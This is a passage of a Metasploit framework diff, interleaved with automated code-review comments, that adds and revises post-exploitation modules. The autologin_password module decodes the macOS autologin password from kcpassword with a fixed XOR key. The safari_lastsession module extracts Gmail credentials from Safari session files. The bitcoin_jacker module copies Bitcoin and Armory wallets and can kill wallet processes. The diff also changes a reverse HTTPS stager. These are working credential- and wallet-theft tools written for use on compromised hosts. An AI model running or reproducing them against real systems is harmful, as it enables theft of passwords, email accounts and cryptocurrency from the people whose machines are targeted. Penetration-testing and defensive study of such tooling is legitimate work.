'').gsub(/\n/, ' ') return php end diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index 40f493d28c..4b3ddc68f4 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb 
@@ -211,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote EOS - html = html.gsub(/^\t\t/, "") + html = html.gsub(/^ {4}/, "") print_status("Sending malicious page") send_response(cli, html, {'Content-Type'=>'text/html'}) diff --git a/modules/exploits/windows/ssh/sysax_ssh_username.rb b/modules/exploits/windows/ssh/sysax_ssh_username.rb index f58fe98552..7700f50f8c 100644 --- a/modules/exploits/windows/ssh/sysax_ssh_username.rb +++ b/modules/exploits/windows/ssh/sysax_ssh_username.rb @@ -216,7 +216,8 @@ class Metasploit3 < Msf::Exploit::Remote :password => pass, :port => datastore['RPORT'], :timeout => 1, - :proxies => datastore['Proxies'] + :proxies => datastore['Proxies'], + :config => false }) ::Timeout.timeout(1) {ssh.close} rescue nil diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index ee06071d32..5c490fb7b7 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -132,11 +132,7 @@ module Metasploit3 p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V") # patch the LPORT - unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 - lport = datastore['HIDDENPORT'] - else - lport = datastore['LPORT'] - end + lport = bind_port lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444 p[lportloc+1] = [lport.to_i].pack('V')[0] @@ -146,11 +142,7 @@ module Metasploit3 # append LHOST and return payload - unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? - lhost = datastore['HIDDENHOST'] - else - lhost = datastore['LHOST'] - end + lhost = bind_address p + lhost.to_s + "\x00" end 
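Review bot: The `:config => false` option added in modules/exploits/windows/ssh/sysax_ssh_username.rb carries no comment, and its purpose is not obvious from the call. If the intent is to keep Net::SSH from loading the local OpenSSH configuration files, so that host entries on the operator's machine cannot override the options passed here, say so next to it: `# :config => false: do not load ~/.ssh/config, it can override the options above`. The enclosing method starts and ends outside the hunk.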
@@ -161,5 +153,33 @@ module Metasploit3 def wfs_delay 20 end + +protected + + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end diff --git a/modules/payloads/stages/windows/vncinject.rb b/modules/payloads/stages/windows/vncinject.rb index 81d278da64..deca1e26d7 100644 --- a/modules/payloads/stages/windows/vncinject.rb +++ b/modules/payloads/stages/windows/vncinject.rb @@ -30,6 +30,6 @@ module Metasploit3 end def library_path - File.join(Msf::Config.data_directory, "vncdll.dll") + File.join(Msf::Config.data_directory, "vncdll.x86.dll") end end diff --git a/modules/post/multi/manage/play_youtube.rb b/modules/post/multi/manage/play_youtube.rb index fda5611bcc..db5b645ffe 100644 --- a/modules/post/multi/manage/play_youtube.rb +++ b/modules/post/multi/manage/play_youtube.rb 
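Review bot: `bind_address` in reverse_https_proxy.rb returns an Array (`addrs`), but the earlier hunk of the same file uses the result as one value, `lhost = bind_address` followed by `p + lhost.to_s + "\x00"`, so the string form of the whole Array is appended instead of a single address. The method should return one String, or the caller should select an element explicitly. In the wildcard test, `addrs == "::0"` compares the Array with a String and is always false; it presumably should read `addrs[0] == "::0"`. `Rex::Socket.resolv_nbo(datastore['LHOST'])` is evaluated before `ReverseListenerBindAddress` is consulted, so a bad LHOST fails even when the override is set.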
@@ -11,11 +11,11 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Multi Manage Youtube Broadcast', + 'Name' => 'Multi Manage YouTube Broadcast', 'Description' => %q{ - This module will broadcast a Youtube video on all compromised systems. It will play + This module will broadcast a YouTube video on specified compromised systems. It will play the video in the target machine's native browser in full screen mode. The VID datastore - option is the "v" parameter in your Youtube video's URL. + option is the "v" parameter in a YouTube video's URL. }, 'License' => MSF_LICENSE, 'Author' => [ 'sinn3r'], @@ -25,7 +25,7 @@ class Metasploit3 < Msf::Post register_options( [ - OptString.new('VID', [true, 'The video ID to the Youtube video']) + OptString.new('VID', [true, 'The video ID to the YouTube video']) ], self.class) end @@ -70,6 +70,7 @@ class Metasploit3 < Msf::Post # # The Linux version uses Firefox + # TODO: Try xdg-open? # def linux_start_video(id) begin @@ -92,7 +93,7 @@ class Metasploit3 < Msf::Post rescue EOFError return false end - + true end diff --git a/modules/post/osx/gather/autologin_password.rb b/modules/post/osx/gather/autologin_password.rb new file mode 100644 index 0000000000..25f14542f4 --- /dev/null +++ b/modules/post/osx/gather/autologin_password.rb 
@@ -0,0 +1,83 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Post
+ include Msf::Post::File
+
+ # extract/verify by by XORing your kcpassword with your password
+ AUTOLOGIN_XOR_KEY = [0x7D, 0x89, 0x52, 0x23, 0xD2, 0xBC, 0xDD, 0xEA, 0xA3, 0xB9, 0x1F]
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'OSX Gather Autologin Password as Root',
+ 'Description' => %q{
+ This module will steal the plaintext password of any user on the machine
+ with autologin enabled. Root access is required.
+
+ When a user has autologin enabled (System Preferences -> Accounts), OSX
+ stores their password with an XOR encoding in /private/etc/kcpassword.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'joev' ],
+ 'Platform' => [ 'osx' ],
+ 'References' => [
+ ['URL', 'http://www.brock-family.org/gavin/perl/kcpassword.html']
+ ],
+ 'SessionTypes' => [ 'shell' ]
+ ))
+
+ register_advanced_options([
+ OptString.new('KCPASSWORD_PATH', [true, 'Path to kcpassword file', '/private/etc/kcpassword'])
+ ], self.class)
+ end
+
+ def run
+ # ensure the user is root (or can read the kcpassword)
+ unless user == 'root'
+ fail_with(Failure::NoAccess, "Root privileges are required to read kcpassword file")
+ end
+
+ # read the autologin account from prefs plist
+ read_cmd = "defaults read /Library/Preferences/com.apple.loginwindow autoLoginUser username"
+ autouser = cmd_exec("/bin/sh -c '#{read_cmd} 2> /dev/null'")
+
+ if autouser.present?
+ print_status "User #{autouser} has autologin enabled, decoding password..."
+ else
+ fail_with(Failure::NotVulnerable, "No users on this machine have autologin enabled")
+ end
+
+ # kcpass contains the XOR'd bytes
+ kcpass = read_file(kcpassword_path)
+ key = AUTOLOGIN_XOR_KEY
+
+ # decoding routine, slices into 11 byte chunks and XOR's each chunk
+ decoded = kcpass.bytes.to_a.each_slice(key.length).map do |kc|
+ kc.each_with_index.map { |byte, idx| byte ^ key[idx] }.map(&:chr).join
+ end.join.sub(/\x00.*$/, '')
+
+ # save in the database
+ report_auth_info(
+ :host => session.session_host,
+ :sname => 'login',
+ :user => autouser,
+ :pass => decoded,
+ :active => true
+ )
+ print_good "Decoded autologin password: #{autouser}:#{decoded}"
+ end
+
+ private
+
+ def kcpassword_path
+ datastore['KCPASSWORD_PATH']
+ end
+
+ def user
+ @user ||= cmd_exec('whoami').chomp
+ end
+end
diff --git a/modules/post/osx/gather/hashdump.rb b/modules/post/osx/gather/hashdump.rb
index 7f8ecc7080..85f389f207 100644
--- a/modules/post/osx/gather/hashdump.rb
+++ b/modules/post/osx/gather/hashdump.rb
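Review bot: In autologin_password.rb, `kcpass = read_file(kcpassword_path)` is used without checking the result, so a missing or unreadable file would surface as a NoMethodError on `kcpass.bytes` rather than a clear failure; other modules in this diff guard the same helper (`read_file(wallet_path) || ''`, `prefetch_file.blank?`). Add `fail_with(Failure::NotFound, "Unable to read #{kcpassword_path}") if kcpass.blank?` before the decoding step. The comment above `AUTOLOGIN_XOR_KEY` has a doubled word ("by by") and would be more useful if it stated that the key is a fixed constant, which is why the file is obfuscation rather than encryption. `print_good` also writes the decoded password to the console in clear text, which is worth noting in the description because console output may be logged.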
@@ -57,19 +57,19 @@ class Metasploit3 < Msf::Post # on 10.8+ ShadowHashData stores a binary plist inside of the user.plist # Here we pull out the binary plist bytes and use built-in plutil to convert to xml plist_bytes = shadow_bytes.split('').each_slice(2).map{|s| "\\x#{s[0]}#{s[1]}"}.join - + # encode the bytes as \x hex string, print using bash's echo, and pass to plutil shadow_plist = cmd_exec("/bin/bash -c 'echo -ne \"#{plist_bytes}\" | plutil -convert xml1 - -o -'") - + # read the plaintext xml shadow_xml = REXML::Document.new(shadow_plist) - + # parse out the different parts of sha512pbkdf2 dict = shadow_xml.elements[1].elements[1].elements[2] entropy = Rex::Text.to_hex(dict.elements[2].text.gsub(/\s+/, '').unpack('m*')[0], '') iterations = dict.elements[4].text.gsub(/\s+/, '') salt = Rex::Text.to_hex(dict.elements[6].text.gsub(/\s+/, '').unpack('m*')[0], '') - + # PBKDF2 stored in format decoded_hash = "#{user}:$ml$#{iterations}$#{salt}$#{entropy}" print_good "SHA512:#{decoded_hash}" @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Post def lte_tiger? ver_num =~ /10\.(\d+)/ and $1.to_i <= 4 end - + # parse the dslocal plist in lion def read_ds_xml_plist(plist_content) doc = REXML::Document.new(plist_content) diff --git a/modules/post/osx/gather/safari_lastsession.rb b/modules/post/osx/gather/safari_lastsession.rb new file mode 100644 index 0000000000..b1ce88251a --- /dev/null +++ b/modules/post/osx/gather/safari_lastsession.rb 
@@ -0,0 +1,224 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Post
+
+ include Msf::Post::File
+
+ def initialize(info={})
+ super( update_info( info,
+ 'Name' => 'OSX Gather Safari LastSession.plist',
+ 'Description' => %q{
+ This module downloads the LastSession.plist file from the target machine.
+ LastSession.plist is used by Safari to track active websites in the current session,
+ and sometimes contains sensitive information such as usernames and passwords.
+
+ This module will first download the original LastSession.plist, and then attempt
+ to find the credential for Gmail. The Gmail's last session state may contain the
+ user's credential if his/her first login attempt failed (likely due to a typo),
+ and then the page got refreshed or another login attempt was made. This also means
+ the stolen credential might contains typos.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'sinn3r'],
+ 'Platform' => [ 'osx' ],
+ 'SessionTypes' => [ 'shell' ],
+ 'References' =>
+ [
+ ['URL', 'http://www.securelist.com/en/blog/8168/Loophole_in_Safari']
+ ]
+ ))
+ end
+
+
+ #
+ # Returns the Safari version based on version.plist
+ # @return [String] The Safari version. If not found, returns ''
+ #
+ def get_safari_version
+ vprint_status("#{peer} - Checking Safari version.")
+ version = ''
+
+ f = read_file("/Applications/Safari.app/Contents/version.plist")
+ xml = REXML::Document.new(f) rescue nil
+ return version if xml.nil?
+
+ xml.elements['plist/dict'].each_element do |e|
+ if e.text == 'CFBundleShortVersionString'
+ version = e.next_element.text
+ break
+ end
+ end
+
+ version
+ end
+
+ def peer
+ "#{session.session_host}:#{session.session_port}"
+ end
+
+
+ #
+ # Converts LastSession.plist to xml, and then read it
+ # @param filename [String] The path to LastSession.plist
+ # @return [String] Returns the XML version of LastSession.plist
+ #
+ def plutil(filename)
+ cmd_exec("plutil -convert xml1 #{filename}")
+ read_file(filename)
+ end
+
+
+ #
+ # Returns the XML version of LastSession.plist (text file)
+ # Just a wrapper for plutil
+ #
+ def get_lastsession
+ print_status("#{peer} - Looking for LastSession.plist")
+ plutil("#{expand_path("~")}/Library/Safari/LastSession.plist")
+ end
+
+
+ #
+ # Returns the element that contains session data
+ # @param lastsession [String] XML data
+ # @return [REXML::Element] The Array element for the session data
+ #
+ def get_sessions(lastsession)
+ session_dict = nil
+
+ xml = REXML::Document.new(lastsession) rescue nil
+ return nil if xml.nil?
+
+ xml.elements['plist'].each_element do |e|
+ found = false
+ e.elements.each do |e2|
+ if e2.text == 'SessionWindows'
+ session_dict = e.elements['array']
+ found = true
+ break
+ end
+ end
+
+ break if found
+ end
+
+ session_dict
+ end
+
+
+ #
+ # Returns the session element
+ # @param xml [REXML::Element] The array element for the session data
+ # @param domain [Regexp] The domain to search for
+ # @return [REXML::Element] The element for the session data
+ #
+ def get_session_element(xml, domain_regx)
+ dict = nil
+
+ found = false
+ xml.each_element do |e|
+ e.elements['array/dict'].each_element do |e2|
+ if e2.text =~ domain_regx
+ dict = e
+ found = true
+ break
+ end
+ end
+
+ break if found
+ end
+
+ dict
+ end
+
+
+ #
+ # Extracts Gmail username/password
+ # @param xml [REXML::Element] The array element for the session data
+ # @return [Array] [0] is the domain, [1] is the user, [2] is the pass
+ #
+ def find_gmail_cred(xml)
+ vprint_status("#{peer} - Looking for username/password for Gmail.")
+ gmail_dict = get_session_element(xml, /(mail|accounts)\.google\.com/)
+ return '' if gmail_dict.nil?
+
+ raw_data = gmail_dict.elements['array/dict/data'].text
+ decoded_data = Rex::Text.decode_base64(raw_data)
+ cred = decoded_data.scan(/Email=(.+)&Passwd=(.+)\&signIn/).flatten
+ user, pass = cred.map {|data| Rex::Text.uri_decode(data)}
+
+ return '' if user.blank? or pass.blank?
+
+ ['mail.google.com', user, pass]
+ end
+
+ #
+ # Runs the module
+ #
+ def run
+ cred_tbl = Rex::Ui::Text::Table.new({
+ 'Header' => 'Credentials',
+ 'Indent' => 1,
+ 'Columns' => ['Domain', 'Username', 'Password']
+ })
+
+ #
+ # Downloads LastSession.plist in XML format
+ #
+ lastsession = get_lastsession
+ if lastsession.blank?
+ print_error("#{peer} - LastSession.plist not found")
+ return
+ else
+ p = store_loot('osx.lastsession.plist', 'text/plain', session, lastsession, 'LastSession.plist.xml')
+ print_good("#{peer} - LastSession.plist stored in: #{p.to_s}")
+ end
+
+ #
+ # If this is an unpatched version, we try to extract creds
+ #
+=begin
+ version = get_safari_version
+ if version.blank?
+ print_warning("Unable to determine Safari version, will try to extract creds anyway")
+ elsif version >= "6.1"
+ print_status("#{peer} - This machine no longer stores session data in plain text")
+ return
+ else
+ vprint_status("#{peer} - Safari version: #{version}")
+ end
+=end
+
+ #
+ # Attempts to convert the XML file to an actual XML object, with the element
+ # holding our session data
+ #
+ lastsession_xml = get_sessions(lastsession)
+ unless lastsession_xml
+ print_error("Cannot read XML file, or unable to find any session data")
+ return
+ end
+
+ #
+ # Look for credential in the session data.
+ # I don't know who else stores their user/pass in the session data, but I accept pull requests.
+ # Already looked at hotmail, yahoo, and twitter
+ #
+ gmail_cred = find_gmail_cred(lastsession_xml)
+ cred_tbl << gmail_cred unless gmail_cred.blank?
+
+ unless cred_tbl.rows.empty?
+ p = store_loot('osx.lastsession.creds', 'text/plain', session, cred_tbl.to_csv, 'LastSession_creds.txt')
+ print_good("#{peer} - Found credential saved in: #{p}")
+ print_line
+ print_line(cred_tbl.to_s)
+ end
+ end
+
+end
diff --git a/modules/post/windows/gather/bitcoin_jacker.rb b/modules/post/windows/gather/bitcoin_jacker.rb
index 790cf03ec6..a740c6c0da 100644
--- a/modules/post/windows/gather/bitcoin_jacker.rb
+++ b/modules/post/windows/gather/bitcoin_jacker.rb
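Review bot: Several YARD comments in safari_lastsession.rb do not match the code: `find_gmail_cred` is documented as `@return [Array]` but returns `''` on both failure paths, and `get_session_element` documents `@param domain` while the parameter is named `domain_regx`. Returning `nil` on failure and documenting `@return [Array, nil]` keeps the `gmail_cred.blank?` test in `run` working and makes the contract honest. The comment on `plutil` should also state that `plutil -convert xml1` rewrites the file in place on the session host, and that `filename` is interpolated into the command line unquoted, so a path containing spaces or shell metacharacters is not handled. The version gate is disabled with `=begin`/`=end` without a note explaining why; if it is ever re-enabled, `version >= "6.1"` is a string comparison and would not order versions correctly.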
@@ -15,63 +15,99 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Gather Bitcoin wallet.dat', + 'Name' => 'Windows Gather Bitcoin Wallet', 'Description' => %q{ - This module downloads any Bitcoin wallet.dat files from the target system + This module downloads any Bitcoin wallet files from the target + system. It currently supports both the classic Satoshi wallet and the + more recent Armory wallets. Note that Satoshi wallets tend to be + unencrypted by default, while Armory wallets tend to be encrypted by default. }, 'License' => MSF_LICENSE, - 'Author' => [ 'illwill '], - 'Platform' => [ 'win' ], + 'Author' => [ + 'illwill ', # Original implementation + 'todb' # Added Armory support + ], + 'Platform' => [ 'win' ], # TODO: Several more platforms host Bitcoin wallets... 'SessionTypes' => [ 'meterpreter' ] )) + + register_options([ + OptBool.new('KILL_PROCESSES', [false, 'Kill associated Bitcoin processes before jacking.', false]), + ], self.class) end def run - print_status("Checking All Users For Bitcoin Wallet...") + print_status("Checking all user profiles for Bitcoin wallets...") + found_wallets = false grab_user_profiles().each do |user| - next if user['AppData'] == nil - tmpath= user['AppData'] + "\\Bitcoin\\wallet.dat" - jack_wallet(tmpath) + next unless user['AppData'] + bitcoin_wallet_path = user['AppData'] + "\\Bitcoin\\wallet.dat" + next unless file?(bitcoin_wallet_path) + found_wallets = true + jack_wallet(bitcoin_wallet_path) + armory_wallet_path = user['AppData'] + "\\Armory" + session.fs.dir.foreach(armory_wallet_path) do |fname| + next unless fname =~ /\.wallet/ + found_wallets = true + armory_wallet_fullpath = armory_wallet_path + "\\#{fname}" + jack_wallet(armory_wallet_fullpath) + end + end + unless found_wallets + print_warning "No wallets found, nothing to do." 
end end - def jack_wallet(filename) - data = "" - return if not file?(filename) + def jack_wallet(wallet_path) + data = "" + wallet_type = case wallet_path + when /\.wallet$/ + :armory + when /wallet\.dat$/ + :satoshi + else + :unknown + end - print_status("Wallet Found At #{filename}") - print_status(" Jackin their wallet...") + if wallet_type == :unknown + print_error "Unknown wallet type: #{wallet_path}, nothing to do." + return + end - kill_bitcoin + print_status("#{wallet_type.to_s.capitalize} Wallet found at #{wallet_path}") + print_status("Jackin' wallet...") + + kill_bitcoin_processes if datastore['KILL_PROCESSES'] begin - data = read_file(filename) || '' + data = read_file(wallet_path) || '' rescue ::Exception => e - print_error("Failed to download #{filename}: #{e.class} #{e}") + print_error("Failed to download #{wallet_path}: #{e.class} #{e}") return end if data.empty? - print_error(" No data found") + print_error("No data found, nothing to save.") else - p = store_loot( - "bitcoin.wallet", + loot_result = store_loot( + "bitcoin.wallet.#{wallet_type}", "application/octet-stream", session, data, - filename, - "Bitcoin Wallet" + wallet_path, + "Bitcoin Wallet (#{wallet_type.to_s.capitalize})" ) - print_status(" Wallet Jacked: #{p.to_s}") + print_status("Wallet jacked: #{loot_result}") end end - def kill_bitcoin - client.sys.process.get_processes().each do |x| - if x['name'].downcase == "bitcoin.exe" - print_status(" #{x['name']} Process Found...") - print_status(" Killing Process ID #{x['pid']}...") - session.sys.process.kill(x['pid']) rescue nil + def kill_bitcoin_processes + client.sys.process.get_processes().each do |process| + pname = process['name'].downcase + if pname == "bitcoin.exe" || pname == "bitcoind.exe" || pname == "armoryqt.exe" + print_status("#{process['name']} Process Found...") + print_status("Killing Process ID #{process['pid']}...") + session.sys.process.kill(process['pid']) end end end 
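Review bot: The two wallet-name patterns in bitcoin_jacker.rb disagree: `run` filters directory entries with the unanchored `fname =~ /\.wallet/`, while `jack_wallet` classifies with `/\.wallet$/`, so a name such as `x.wallet.bak` (constructed example) passes the first test and is then reported as "Unknown wallet type". Use one anchored pattern in both places, preferably with `\z` instead of `$`. Separately, `rescue ::Exception => e` around `read_file` also catches interrupts and other non-StandardError exceptions; `rescue ::StandardError => e` would be the narrower choice.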
diff --git a/modules/post/windows/gather/credentials/sso.rb b/modules/post/windows/gather/credentials/sso.rb index 22572c3f95..4f5b27cd9c 100644 --- a/modules/post/windows/gather/credentials/sso.rb +++ b/modules/post/windows/gather/credentials/sso.rb @@ -99,6 +99,7 @@ class Metasploit3 < Msf::Post def report_creds(domain, user, pass) return if (user.empty? or pass.empty?) + return if pass.include?("n.a.") if session.db_record source_id = session.db_record.id diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index cbc121bc6e..81ca4376a6 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -3,10 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +require 'msf/core' +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry @@ -15,12 +15,13 @@ class Metasploit3 < Msf::Post super(update_info(info, 'Name' => 'Windows Gather Prefetch File Information', 'Description' => %q{ - This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems. - Run count, hash and filename information is collected from each prefetch file while - Last Modified and Create times are file MACE values. + This module gathers prefetch file information from WinXP, Win2k3 and Win7 systems + and current values of related registry keys. From each prefetch file we'll collect + filetime (converted to utc) of the last execution, file path hash, run count, filename + and the execution path. }, 'License' => MSF_LICENSE, - 'Author' => ['TJ Glad '], + 'Author' => ['TJ Glad '], 'Platform' => ['win'], 'SessionType' => ['meterpreter'] )) 
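Review bot: `return if pass.include?("n.a.")` in sso.rb's `report_creds` discards any credential whose password merely contains the substring `n.a.`, not only the placeholder value it is presumably meant to filter. If the placeholder has a fixed form, match it exactly or anchor it at the start of the string, and add a comment saying which tool output produces it, e.g. `# skip placeholder entries emitted when no password was recovered`. `report_creds` continues outside the hunk.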
@@ -43,7 +44,7 @@ class Metasploit3 < Msf::Post end def print_timezone_key_values(key_value) - # Looks for timezone from registry + # Looks for timezone information from registry. timezone = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", key_value) tz_bias = registry_getvaldata("HKLM\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation", "Bias") if timezone.nil? or tz_bias.nil? 
@@ -60,36 +61,69 @@ class Metasploit3 < Msf::Post end end - def gather_pf_info(name_offset, hash_offset, runcount_offset, filename) - # We'll load the file and parse information from the offsets + def gather_pf_info(name_offset, hash_offset, runcount_offset, filetime_offset, filename) + # Collects the desired information from each prefetch file found + # from the system. + prefetch_file = read_file(filename) - if prefetch_file.empty? or prefetch_file.nil? + if prefetch_file.blank? print_error("Couldn't read file: #{filename}") return nil else - # First we'll get the filename - pf_filename = prefetch_file[name_offset..name_offset+60] + # First we extract the saved filename + pf_filename = prefetch_file[name_offset, 60] idx = pf_filename.index("\x00\x00") name = Rex::Text.to_ascii(pf_filename.slice(0..idx)) - # Next we'll get the run count - run_count = prefetch_file[runcount_offset..runcount_offset+4].unpack('L*')[0].to_s - # Then file path hash - path_hash = prefetch_file[hash_offset..hash_offset+4].unpack('h8')[0].reverse.upcase.to_s - # Last is mace value for timestamps - mtimes = client.priv.fs.get_file_mace(filename) - if mtimes.nil? or mtimes.empty? - last_modified = "Error reading value" - created = "Error reading value" - else - last_modified = mtimes['Modified'].utc.to_s - created = mtimes['Created'].utc.to_s + + # Then we get the runcount + run_count = prefetch_file[runcount_offset, 4].unpack('v')[0] + + # Then the filepath hash + path_hash = prefetch_file[hash_offset, 4].unpack('h*')[0].upcase.reverse + + # Last we get the latest execution time + filetime_a = prefetch_file[filetime_offset, 16].unpack('q*') + filetime = filetime_a[0] + filetime_a[1] + last_exec = Time.at((filetime - 116444736000000000) / 10000000).utc.to_s + + # This is for reading file paths of the executable from + # the prefetch file. We'll use this to find out from where the + # file was executed. 
+ + # First we'll use specific offsets for finding out the location + # and length of the filepath so that we can find it. + filepath = [] + fpath_offset = prefetch_file[0x64, 2].unpack('v').first + fpath_length = prefetch_file[0x68, 2].unpack('v').first + filepath_data = prefetch_file[fpath_offset, fpath_length] + + # This part will extract the filepath so that we can find and + # compare its contents to the filename we found previously. This + # allows us to find the filepath (if it can be found inside the + # prefetch file) used to execute the program + # referenced in the prefetch-file. + unless filepath_data.blank? + fpath_data_array = filepath_data.split("\\\x00D\x00E\x00V\x00I\x00C\x00E") + fpath_data_array.each do |path| + unless path.blank? + fpath_name = path.split("\\").last.gsub(/\0/, '') + if fpath_name == name + filepath << path + end + end + end end - return [last_modified, created, run_count, path_hash, name] end + if filepath.blank? + filepath << "*** Filepath not found ***" + end + + return [last_exec, path_hash, run_count, name, filepath[0]] end def run print_status("Prefetch Gathering started.") + # Check to see what Windows Version is running. # Needed for offsets. # Tested on WinXP, Win2k3 and Win7 systems. @@ -100,18 +134,18 @@ class Metasploit3 < Msf::Post error_msg = "You don't have enough privileges. Try getsystem." if sysnfo =~/(Windows XP|2003|.NET)/ - # For some reason we need system privileges to read file - # mace time on XP/2003 while we can do the same only - # as admin on Win7. - if not is_system? + + if not is_admin? print_error(error_msg) return nil end + # Offsets for WinXP & Win2k3 print_good("Detected #{sysnfo} (max 128 entries)") name_offset = 0x10 hash_offset = 0x4C runcount_offset = 0x90 + filetime_offset = 0x78 # Registry key for timezone key_value = "StandardName" 
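Review bot: The last-execution time in `gather_pf_info` is built by reading 16 bytes as two 64-bit values and adding them (`filetime_a[0] + filetime_a[1]`), which is only right while one of the two fields happens to be zero, and `'q'` is signed and native-endian. `run` already passes a per-version `filetime_offset`, so read one little-endian FILETIME at that offset instead, `lo, hi = prefetch_file[filetime_offset, 8].unpack('V2')` then `filetime = (hi << 32) | lo`, and give each Windows version its own offset if the layouts differ, as the sum suggests they do. The run count is sliced as 4 bytes but unpacked with `'v'`, which keeps only the low 16 bits; `'V'` matches the slice. `idx` is nil when no double NUL occurs in the 60-byte name window, and `slice(0..idx)` then raises, so a malformed prefetch file aborts the whole listing.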
@@ -120,14 +154,15 @@ class Metasploit3 < Msf::Post print_error(error_msg) return nil end + # Offsets for Win7 print_good("Detected #{sysnfo} (max 128 entries)") name_offset = 0x10 hash_offset = 0x4C runcount_offset = 0x98 + filetime_offset = 0x78 # Registry key for timezone key_value = "TimeZoneKeyName" - else print_error("No offsets for the target Windows version. Currently works only on WinXP, Win2k3 and Win7.") return nil @@ -138,12 +173,13 @@ class Metasploit3 < Msf::Post 'Indent' => 1, 'Columns' => [ - "Modified (mace)", - "Created (mace)", + "Last execution (filetime)", "Run Count", "Hash", - "Filename" + "Filename", + "Filepath" ]) + print_prefetch_key_value print_timezone_key_values(key_value) print_good("Current UTC Time: %s" % Time.now.utc) @@ -165,7 +201,7 @@ class Metasploit3 < Msf::Post next else filename = ::File.join(file['path'], file['name']) - pf_entry = gather_pf_info(name_offset, hash_offset, runcount_offset, filename) + pf_entry = gather_pf_info(name_offset, hash_offset, runcount_offset, filetime_offset, filename) if not pf_entry.nil? table << pf_entry end diff --git a/modules/post/windows/manage/ie_proxypac.rb b/modules/post/windows/manage/ie_proxypac.rb index aef00af5d9..8b3c9f2862 100644 --- a/modules/post/windows/manage/ie_proxypac.rb +++ b/modules/post/windows/manage/ie_proxypac.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post 'Name' => 'Windows Manage Proxy PAC File', 'Description' => %q{ This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC - option, a PAC file will be created in the victim host. It's also possible to provide a + option, a PAC file will be created on the victim host. It's also possible to provide a remote PAC file (REMOTE_PAC option) by providing the full URL. }, 'License' => MSF_LICENSE, diff --git a/msfbinscan b/msfbinscan index e9fe1dff76..72d403ad77 100755 --- a/msfbinscan +++ b/msfbinscan 
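Review bot: The column list added in the `@@ -138,12 +173,13 @@` hunk of enum_prefetch.rb puts "Run Count" before "Hash", but `gather_pf_info` returns `[last_exec, path_hash, run_count, name, filepath[0]]`, so the hash is printed under Run Count and the count under Hash. Make the two agree, for example `return [last_exec, run_count, path_hash, name, filepath[0]]`. For an evidence-gathering module a mislabelled column is worth a spec that checks the row order against the header.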
@@ -112,7 +112,7 @@ opt.on('-I', '--image-base [address]', 'Specify an alternate ImageBase param['imagebase'] = opt2i(t) end -opt.on('-D', '--disasm', 'Disassemble the bytes at this address [PE]') do |t| +opt.on('-D', '--disasm', 'Disassemble the bytes at this address [PE|ELF]') do |t| param['disasm'] = true end diff --git a/msfcli b/msfcli index fb346c1ca8..ee81c889bc 100755 --- a/msfcli +++ b/msfcli @@ -312,6 +312,8 @@ class Msfcli modules[:module] = @framework.exploits.create($1) elsif module_name =~ /auxiliary\/(.*)/ modules[:module] = @framework.auxiliary.create($1) + elsif module_name =~ /post\/(.*)/ + modules[:module] = @framework.post.create($1) else modules[:module] = @framework.exploits.create(module_name) if modules[:module].nil? diff --git a/msfelfscan b/msfelfscan index fcbe9eeb35..4651b2b6ae 100755 --- a/msfelfscan +++ b/msfelfscan @@ -82,6 +82,10 @@ opt.on('-B', '--before [bytes]', 'Number of bytes to show before match (-a/-b)') param['before'] = opt2i(t) end +opt.on('-D', '--disasm', 'Disassemble the bytes at this address') do |t| + param['disasm'] = true +end + opt.on('-I', '--image-base [address]', 'Specify an alternate ImageBase') do |t| param['imagebase'] = opt2i(t) end diff --git a/msfvenom b/msfvenom index 1fe9e13c18..ae4ac54e77 100755 --- a/msfvenom +++ b/msfvenom @@ -461,8 +461,6 @@ class MsfVenom exe = ::Msf::Util::EXE.to_executable_fmt(framework, @opts[:arch], @opts[:platform], payload_raw, 